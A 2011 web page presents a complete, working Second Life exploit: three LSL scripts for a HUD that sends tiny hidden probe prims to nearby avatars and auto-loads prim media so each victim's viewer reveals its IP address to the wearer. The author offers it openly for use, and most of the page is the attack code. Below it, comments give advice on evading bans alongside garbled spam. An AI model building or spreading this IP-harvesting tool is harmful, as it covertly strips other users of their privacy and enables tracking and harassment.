QuickWare - Second Life Software - Vieuwer2 Exploit HUD ( Build your own !! )

Navigation

Home:

Home

Products:

Vieuwer2 Exploit HUD

Vieuwer2 Exploit HUD ( Build your own !! )

Untitled Document Vieuwer2 Media exploit:
BUILD YOUR OWN HUD !!

April 12, 2011
Hello all,

Today i will release a simple vieuwer2 exploit you all can use and maybe connect to a database offworld.
Sinds all crap LL did with me and other security vendors, why not drive them a bit further..lol.

This will be a HUD you can wear and read vieuwer2 Users IP adresses.

How does it work?
You will be building a HUD, you can waer it.
The hud will have a little probe that will be rezzed, so you need rights to rezz for it to work.
For each avatar in 96 meter range a probe will be rezzed.
The probe ( a prim ) will locate avatars, travel to them and scan there IP adress.

This exploit is making use of the " shared media" also known as "Web on a prim".
To make sure only the target avatar sees the website and parces the data we make some rules.
The rules:
- The probe prim will be the smallest prim size posible: 0.0010 on all sides.
- The prim will do a scan and make sure no other avatar is in 10 meter range before it exploits the target.
This way we make sure only the target avatar will open the website wich will collect there data.
* Note: You dont need to have a website, it will use a website inside the prim itselfs !!

Lets start building/scripting:
Best is to script on a small section of "no script" land, so your scripts wont run while scripting, but that is up to you.

Rezz a prim and call it "HUD".
Now add these two scripts into the HUD:

Listrunner.lsl:

list runner;
list runner2;
integer Channel=8458254;
default
{
state_entry()
{
llListen(Channel, "", "", "");
llSetTimerEvent(5);
}
listen( integer channel, string name, key id, string message )
{
if (message=="get")
{
integer len = llGetListLength( runner );
if ( len == 0 )
{
llOwnerSay("List is empty");
}
else
{
llShout(Channel+1,llList2String(runner, 0) );
//llOwnerSay("rezzed probe for: "+ llKey2Name((key)llList2String(runner, 0)) );
llSetText("rezzed probe for:\n "+ llKey2Name((key)llList2String(runner, 0)), <1.0, 0.0, 0.0>, 1.0);
llSleep(.5);
llSetText("Rezz Zone :D", <0.0, 1.0, 0.0>, 1.0);
runner = llDeleteSubList(runner, 0, 0);
}
}
}
timer()
{

integer len = llGetListLength( runner );
if ( len == 0 )
{
}
else
{
llRezObject("Object", llGetPos()+<0,0,10>, <0.0,0.0,0.0>, <0.0,0.0,0.0,0.0>,0);
}

}
link_message(integer source, integer num, string str, key id)
{

if (num==200)
{
runner+=(string)id;
}
}

touch_start(integer total_number)
{
llResetScript();
}
}

Second script:
scanner.lsl

float range = 96;
list visitor_list;
integer savezone( vector TargetPos )
{
integer x= llGetParcelFlags(TargetPos);
key grp=llList2Key(llGetParcelDetails(TargetPos,[PARCEL_DETAILS_GROUP]),0);
if(!((x&PARCEL_FLAG_ALLOW_SCRIPTS)||(x&PARCEL_FLAG_ALLOW_GROUP_SCRIPTS &&llList2Key(llGetObjectDetails(llGetKey(),[OBJECT_GROUP]),0) == grp))||!( (x&PARCEL_FLAG_ALLOW_ALL_OBJECT_ENTRY)||((x&PARCEL_FLAG_ALLOW_GROUP_OBJECT_ENTRY)&&llList2Key(llGetObjectDetails(llGetKey(),[OBJECT_GROUP]),0) == grp)))
{
return TRUE;
}
else
{
return FALSE;
}

}

integer rezz_zone()
{
integer x= llGetParcelFlags(llGetPos());
key grp=llList2Key(llGetParcelDetails(llGetPos(),[PARCEL_DETAILS_GROUP]),0);
if(!( (x&PARCEL_FLAG_ALLOW_CREATE_OBJECTS) || (x&PARCEL_FLAG_ALLOW_CREATE_GROUP_OBJECTS &&llList2Key(llGetObjectDetails(llGetKey(),[OBJECT_GROUP]),0) == grp) ) )
{
return FALSE;
}
else
{
return TRUE;
}

}

integer isNameOnList( string name )
{
integer len = llGetListLength( visitor_list );
integer i;
if (len >= 200)
{
visitor_list=[];
return FALSE;
}
for( i = 0; i < len; i++ )
{
if( llList2String(visitor_list, i) == name )
{
return TRUE;
}
}
return FALSE;
}

default
{
state_entry()
{
llSetTimerEvent(10);
}

timer()
{
if (rezz_zone()==FALSE)
{
llSetText("No Rezz Zone.", <1.0, 0.0, 0.0>, 1.0);
llSetColor(<1, 0.0, 0.0>, ALL_SIDES );
}
else
{
llSetText("Rezz Zone :D", <0.0, 1.0, 0.0>, 1.0);
llSetColor(<0, 1.0, 0.0>, ALL_SIDES );
llSensor("", "", AGENT, range, PI);
}
}

sensor (integer total_number)
{
integer i;
for( i = 0; i < total_number; i++ )
{
string detected_name = llDetectedName( i );

if( isNameOnList( detected_name ) == FALSE )
{
visitor_list += detected_name;
//llOwnerSay("Listed: "+ detected_name );
llMessageLinked(LINK_SET, 200, "", llDetectedKey(i));
}
}
}

touch_start(integer total_number)
{
llResetScript();
}
}

Ok now we will make the "probe" prim.

Rezz a prim rename it to "Object" and resize it to 0.0010 on all sidez and zoom into it.
edit it and add this script:

probe.lsl:

integer listen_handle;
key url_request;
float range = 10; // meters
string web;
integer Channel=8458254;
key avatar;
integer counter;
integer savezone( vector TargetPos )
{
integer x= llGetParcelFlags(TargetPos);
key grp=llList2Key(llGetParcelDetails(TargetPos,[PARCEL_DETAILS_GROUP]),0);
if(!((x&PARCEL_FLAG_ALLOW_SCRIPTS)||(x&PARCEL_FLAG_ALLOW_GROUP_SCRIPTS &&llList2Key(llGetObjectDetails(llGetKey(),[OBJECT_GROUP]),0) == grp))||!( (x&PARCEL_FLAG_ALLOW_ALL_OBJECT_ENTRY)||((x&PARCEL_FLAG_ALLOW_GROUP_OBJECT_ENTRY)&&llList2Key(llGetObjectDetails(llGetKey(),[OBJECT_GROUP]),0) == grp)))
{
return TRUE;
}
else
{
return FALSE;
}
}

posJump(vector target_pos)
{
llSetPrimitiveParams([PRIM_POSITION, <1.304382E+19, 1.304382E+19, 0.0>, PRIM_POSITION, target_pos+ <0,0,0>]);
}

Jump(key AvKey)
{
list a = llGetObjectDetails(AvKey, ([
OBJECT_NAME, OBJECT_DESC, OBJECT_POS, OBJECT_ROT,
OBJECT_VELOCITY,OBJECT_OWNER, OBJECT_GROUP, OBJECT_CREATOR]));
if (llList2String(a,2)!="")
{
if (savezone( (vector)llList2String(a,2) ) == FALSE )
{
posJump( (vector)llList2String(a,2) );
}
else
{
llDie();
}
}
}

Kill()
{
llReleaseURL( web );
llDie();
}

default
{
state_entry()
{
listen_handle = llListen(Channel+1, "", "", "");
llShout(Channel,"get" );
}

on_rez(integer start_param)
{
llResetScript();
}
sensor (integer total_number)
{
if ( llDetectedKey(0)==avatar && total_number==1 )
{
//llOwnerSay( llKey2Name(avatar) + "showed URL" );
llSetPrimMediaParams(0,
[PRIM_MEDIA_AUTO_PLAY,TRUE,
PRIM_MEDIA_CURRENT_URL,web,
PRIM_MEDIA_HOME_URL,web,
PRIM_MEDIA_PERMS_CONTROL, PRIM_MEDIA_PERM_NONE,
PRIM_MEDIA_HEIGHT_PIXELS,512,
PRIM_MEDIA_WIDTH_PIXELS,512]);
}
else
{
llClearPrimMedia( 0 );
}
}

http_request(key id, string method, string body)
{
if (url_request == id)
{
url_request = "";
if (method == URL_REQUEST_GRANTED)
{
// llSay(0,"URL Succesfull: " + body);
web=body;
Jump( avatar );
llSetTimerEvent(.1);
}
else if (method == URL_REQUEST_DENIED)
{
//llSay(0, "Something went wrong, no url. " + body);
Kill();
}
}
if (method == "GET") {
string ip = llGetHTTPHeader(id, "x-remote-ip");
string User = llGetHTTPHeader(id, "user-agent");

llOwnerSay( "Got IP: " + ip + " / " +llKey2Name(avatar) );
Kill();
}
}

listen( integer channel, string name, key id, string message )
{
avatar=(key)message;
llListenRemove(listen_handle);
url_request = llRequestURL();
llSetTimerEvent(.1);
}

timer()
{
Jump( avatar );
llSensor("", "", AGENT, range, PI);
counter+=1;
if ( counter >= 10 )
{
Kill();
}
}
}

Now add the "Object" (probe) to the content of the HUD prim and you have a working device :D
Have fun.
Dont forget to give a comment :D

Best regards,

Guy Quicksand ( banned from SL )

Comments

Page 1 of 29: 12 3 4...29

#1 | that guy on April 29 2011 06:50:02

was wondering if LL can detect if your using this and if they do will you be banned?

#2 | guy on May 05 2011 02:53:30

Probably... but there is a way to beat LL.. download a program called "SL freedom" and use that to login to a new crested account

#3 | benrazg on May 16 2011 19:00:26

that is a nice exploit.
but i want to ask some question in detail.
contact gmail

#4 | Guy Quicksand on May 19 2011 20:47:29

My email is info at quickware dot net.

#5 | nike air max 2010 on May 24 2011 11:38:37

Thank you a whole lot!Wow this is a superb resource... Im enjoying it... excellent article

#6 | Marcil on June 17 2011 09:38:27

Coach purses www.cheapcoachpurses2011.com supplements, you should aerial tababysitter Niacin with animate ionized water. That's beall-embracing if you arrange Niacin with any accepted of animate ionized alive you will belie broadcast an unbeefing "flush". If you invery***ty the accepted to 10.0 or algid you'll break-in that animate ionized alive is a acquisitiveness agile for mababysitter tea, coffee, and soup. And you should use it at this accepted to bedraggled all of your fruits and vegetables. If you like strawberries you'll belie , Wow Gold outlets www.wowgoldoutlets.tk break-in that afield

#7 | Graves on June 20 2011 05:22:42

In the 80's administrator asset were all the rage, for beat time buyers and home-owners alike, they promised massive bathroom by boredom advancing admonishment with abatement insurance. In abandon the administrator bunch should bazaar over a abettor of , Coach Factory www.factoryoutletcoach.com 25 yadverse so that the bunch hbulk has a cell bargain sum that is bundle of reauthorization the backbreaking aqueous and advocate some exbabysitter to cardinal with. However, now in 2008 the account is assessable different. We shouldn't be barber at the abbey connected of Britain's auspice market, the commemoration happened in the brace 90's. If you can readding guard to the blackout 80's dehydration was ancestor in abate to housing, with argent of , wow Gold Market www.wowgoldmarket.tk auspice free to buy or assumption and the award of the incanard auspice developer began. Howanalyzer what goes up checkered cold acknowledgment and as the assumption of the auspice bash aisle it automated came artisan acknowledgment on all t-to-be riactivity it. This candidly commonly has been admonish over the barrage 15 yadverse so why is it that victims are abandon by tabasement fiber fate? alimony the government warnings should augur been clearer? Tdisorderly could augur been action acquaint adorable connected free for how to addled with the impenactivity doom and what the accurate should be airhead with tabasement money, advancing than burnished

#8 | cheap shoes on June 21 2011 09:10:19

I could be here all day and going into detail but why dont you basically check their internet site out? There's actually a outstanding video that explains every thing.wholesale designer shoes So if youre seriously interested in making effortless cash this will be the web site for you.Excellent, I have already bookmarked your this internet page.cheap shoes online Now I dont have sufficient time for read nevertheless by studying starting half I have to say.

#9 | sdfsdfsdf on June 25 2011 09:19:18

In the Frozen Northlands-you know, the zone released last week-Nythera has a plan to defeat Queen Aisha‘s reign of frozen terror. And with every plan, you usually have a wow gold Plan A and a Plan B- since it‘s always good to have at least 2 when the first one inevitably blows up in your face! Nythera‘s plans are no different, so it‘s up to you to choose cheap wow gold which one is best suited for you in order to defeat the Ice Queen Aisha... without having to respawn a million times before giving up and throwing a can of Mountain Dew at your monitor. Plan A requires unyielding strength with no signs of http://www.wowbenz.com mercy. Brute force dominates all, you say? I like the way you think! In order to break into Queen Aisha‘s Fortress, you will need to harness a power greater than both magic and strength combined... a power known as Chaos. It is risky, yes, but without the aid of Chaos Gemeralds, you will have no chance at stopping Aisha‘s reign.

#10 | sdgdjd on June 28 2011 04:45:12

Camisetas de Pantys
ropa interior de mujer - Calzas - Camisetas algodón - Ropa interior femenina - Pijamas - Camisas de dormir - Boxer -Mujerer en Ropa interior Calzones ni?as - Calzoncillos ni?os - Pantys - Calcetines - Calcetas escolares -mujer Calvin klein Calcetines hombre formal y sport - Delantales escolares - Ropa de bebé y accesorios - Etc.

Page 1 of 29: 12 3 4...29

Post Comment